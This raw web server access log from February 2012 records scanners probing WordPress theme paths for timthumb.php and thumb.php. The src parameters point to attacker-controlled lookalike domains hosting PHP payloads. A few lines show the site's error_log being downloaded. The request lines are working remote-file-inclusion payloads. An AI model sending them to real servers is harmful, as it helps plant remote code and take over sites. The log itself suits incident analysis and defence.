176.31.110.52 - - [23/Feb/2012:08:26:51 +0900] "GET //wp-content/themes/redcarpet/scripts/timthumb.php?src=http://blogger.com.babyfesta.com.br/index.php HTTP/1.1" 404 255
175.199.25.71 - - [23/Feb/2012:08:30:33 +0900] "GET //wp-content/themes/redcarpet/scripts/timthumb.php?src=http://blogger.com.babyfesta.com.br/index.php HTTP/1.1" 404 255
187.17.160.15 - - [23/Feb/2012:08:53:56 +0900] "GET /error_log//wp-content/themes/bueno/thumb.php?src=http://picasa.com.gonzalomiranda.cl/cybercrime.php HTTP/1.1" 404 250
187.17.160.15 - - [23/Feb/2012:08:53:59 +0900] "GET //wp-content/themes/bueno/thumb.php?src=http://picasa.com.gonzalomiranda.cl/cybercrime.php HTTP/1.1" 404 240
50.63.25.155 - - [23/Feb/2012:09:07:28 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://picasa.com.musicui.com/sanex.php HTTP/1.1" 404 240
50.63.25.155 - - [23/Feb/2012:09:07:28 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://picasa.com.broerups.dk/yahoo.php HTTP/1.1" 404 240
79.125.7.61 - - [23/Feb/2012:09:07:29 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://picasa.com.medo.ro/is.php HTTP/1.1" 404 240
50.63.25.155 - - [23/Feb/2012:09:07:30 +0900] "GET /access_log.last//wp-content/themes/boast/thumb.php?src=http://picasa.com.broerups.dk/yahoo.php HTTP/1.1" 404 256
50.63.25.155 - - [23/Feb/2012:09:07:31 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://picasa.com.broerups.dk/yahoo.php HTTP/1.1" 404 240
50.63.25.155 - - [23/Feb/2012:09:07:31 +0900] "GET /error_log//wp-content/themes/boast/thumb.php?src=http://picasa.com.musicui.com/sanex.php HTTP/1.1" 404 250
50.63.25.155 - - [23/Feb/2012:09:07:31 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://picasa.com.musicui.com/sanex.php HTTP/1.1" 404 240
50.63.25.155 - - [23/Feb/2012:09:07:31 +0900] "GET /access_log.last//wp-content/themes/boast/thumb.php?src=http://picasa.com.musicui.com/sanex.php HTTP/1.1" 404 256
79.125.7.61 - - [23/Feb/2012:09:07:36 +0900] "GET /access_log.last//wp-content/themes/boast/thumb.php?src=http://picasa.com.medo.ro/is.php HTTP/1.1" 404 256
79.125.7.61 - - [23/Feb/2012:09:07:37 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://picasa.com.medo.ro/is.php HTTP/1.1" 404 240
67.207.147.51 - - [23/Feb/2012:09:07:37 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://blogger.com.euroloisir.fr.fo/404.php HTTP/1.1" 404 240
67.207.147.51 - - [23/Feb/2012:09:07:38 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://blogger.com.euroloisir.fr.fo/bot.php HTTP/1.1" 404 240
67.207.147.51 - - [23/Feb/2012:09:07:38 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://blogger.com.euroloisir.fr.fo/sp.php HTTP/1.1" 404 240
67.207.147.51 - - [23/Feb/2012:09:07:39 +0900] "GET //wp-content/themes/boast/thumb.php?src=http://blogger.com.euroloisir.fr.fo/xx.php HTTP/1.1" 404 240
176.31.110.52 - - [23/Feb/2012:09:17:15 +0900] "GET //wp-content/themes/redcarpet/timthumb.php?src=http://blogger.com.babyfesta.com.br/index.php HTTP/1.1" 404 247
175.199.25.71 - - [23/Feb/2012:09:20:29 +0900] "GET //wp-content/themes/redcarpet/timthumb.php?src=http://blogger.com.babyfesta.com.br/index.php HTTP/1.1" 404 247
94.23.242.97 - - [23/Feb/2012:09:46:37 +0900] "GET /error_log//wp-content/themes/inspire/functions/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 262
94.23.242.97 - - [23/Feb/2012:09:46:39 +0900] "GET //wp-content/themes/inspire/functions/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 252
187.17.160.15 - - [23/Feb/2012:09:59:40 +0900] "GET /error_log//wp-content/themes/bueno/thumb.php?src=http://picasa.com.gonzalomiranda.cl/cybercrime.php HTTP/1.1" 404 250
187.17.160.15 - - [23/Feb/2012:09:59:40 +0900] "GET //wp-content/themes/bueno/thumb.php?src=http://picasa.com.gonzalomiranda.cl/cybercrime.php HTTP/1.1" 404 240
64.15.136.144 - - [23/Feb/2012:10:09:15 +0900] "HEAD http://www.nukuijidosya.co.jp/error_log HTTP/1.1" 200 0
64.15.136.144 - - [23/Feb/2012:10:09:24 +0900] "HEAD http://www.nukuijidosya.co.jp/error_log HTTP/1.1" 200 0
64.15.136.144 - - [23/Feb/2012:10:09:40 +0900] "HEAD http://www.nukuijidosya.co.jp/error_log HTTP/1.1" 200 0
74.125.17.146 - - [23/Feb/2012:10:09:52 +0900] "GET /error_log HTTP/1.1" 200 131389
38.107.179.220 - - [23/Feb/2012:10:12:03 +0900] "GET /robots.txt HTTP/1.1" 404 216
38.107.179.221 - - [23/Feb/2012:10:12:23 +0900] "GET /error_log HTTP/1.1" 200 131518